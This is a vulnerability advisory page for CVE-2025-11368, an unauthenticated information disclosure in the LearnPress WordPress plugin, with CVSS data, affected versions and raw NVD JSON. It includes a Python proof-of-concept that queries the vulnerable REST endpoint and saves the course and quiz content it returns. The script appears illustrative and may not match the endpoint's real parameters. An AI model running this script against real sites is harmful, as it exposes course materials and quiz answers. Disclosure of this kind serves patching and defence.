Security Vulnerability Report
CVE-2025-11368 CVSS 5.3 MEDIUM

Published: 2025-11-21 06:15:47
Last Modified: 2026-04-15 00:35:42

Description

The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Sensitive Information Disclosure in all versions up to, and including, 4.2.9.4. This is due to missing capability checks in the REST endpoint /wp-json/lp/v1/load_content_via_ajax, which allows arbitrary callback execution of admin-only template methods. As a result, unauthenticated attackers can retrieve admin curriculum HTML, quiz questions with correct answers, course materials, and other sensitive educational content via the REST API endpoint, provided they can supply valid numeric IDs.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

LearnPress WordPress LMS Plugin < 4.2.9.4
LearnPress WordPress LMS Plugin <= 4.2.9.4
LearnPress WordPress LMS Plugin 4.3.0 (fixed)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import json

import requests

# CVE-2025-11368 PoC - LearnPress Sensitive Information Disclosure
# Target: WordPress site with LearnPress plugin <= 4.2.9.4
target_url = "http://target-wordpress-site.com"

# Endpoint vulnerable to information disclosure
endpoint = "/wp-json/lp/v1/load_content_via_ajax"

# Payload to retrieve course content (need valid course/quiz IDs)
# Replace COURSE_ID with actual course ID found on the site
course_id = "1"  # Example course ID
params = {
    "id": course_id,
    "type": "course",  # Can be 'course', 'quiz', 'lesson', etc.
}

url = f"{target_url}{endpoint}"
print(f"[*] Sending request to: {url}")
print(f"[*] Parameters: {params}")

# No authentication required - this is the vulnerability
response = requests.get(url, params=params)

if response.status_code == 200:
    try:
        data = response.json()
        print("\n[+] Vulnerable! Received response:")
        print(json.dumps(data, indent=2, ensure_ascii=False))

        # Save sensitive data
        with open(f"cve-2025-11368_course_{course_id}.json", "w", encoding="utf-8") as f:
            json.dump(data, f, indent=2, ensure_ascii=False)
        print(f"\n[+] Data saved to cve-2025-11368_course_{course_id}.json")
    except ValueError:
        # response.json() raises a ValueError subclass when the body is not JSON
        print("\n[+] Response received (not JSON):")
        print(response.text[:1000])
else:
    print(f"\n[-] Request failed with status: {response.status_code}")

# Example: Enumerate quiz questions with correct answers
quiz_id = "1"
params_quiz = {
    "id": quiz_id,
    "type": "quiz",
}

print("\n[*] Attempting to retrieve quiz questions...")
response_quiz = requests.get(url, params=params_quiz)
if response_quiz.status_code == 200:
    print("[+] Quiz data retrieved - may contain correct answers!")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11368", "sourceIdentifier": "[email protected]", "published": "2025-11-21T06:15:47.343", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Sensitive Information Disclosure in all versions up to, and including, 4.2.9.4. This is due to missing capability checks in the REST endpoint /wp-json/lp/v1/load_content_via_ajax which allows arbitrary callback execution of admin-only template methods. This makes it possible for unauthenticated attackers to retrieve admin curriculum HTML, quiz questions with correct answers, course materials, and other sensitive educational content via the REST API endpoint granted they can supply valid numeric IDs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/learnpress/trunk/inc/rest-api/v1/frontend/class-lp-rest-ajax-controller.php#L23", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/learnpress/trunk/inc/rest-api/v1/frontend/class-lp-rest-ajax-controller.php#L41", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?old_path=/learnpress/tags/4.2.9.4&new_path=/learnpress/tags/4.3.0&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": 
"https://www.wordfence.com/threat-intel/vulnerabilities/id/0c9856db-3779-4649-9a48-1c7b6d019816?source=cve", "source": "[email protected]"}]}}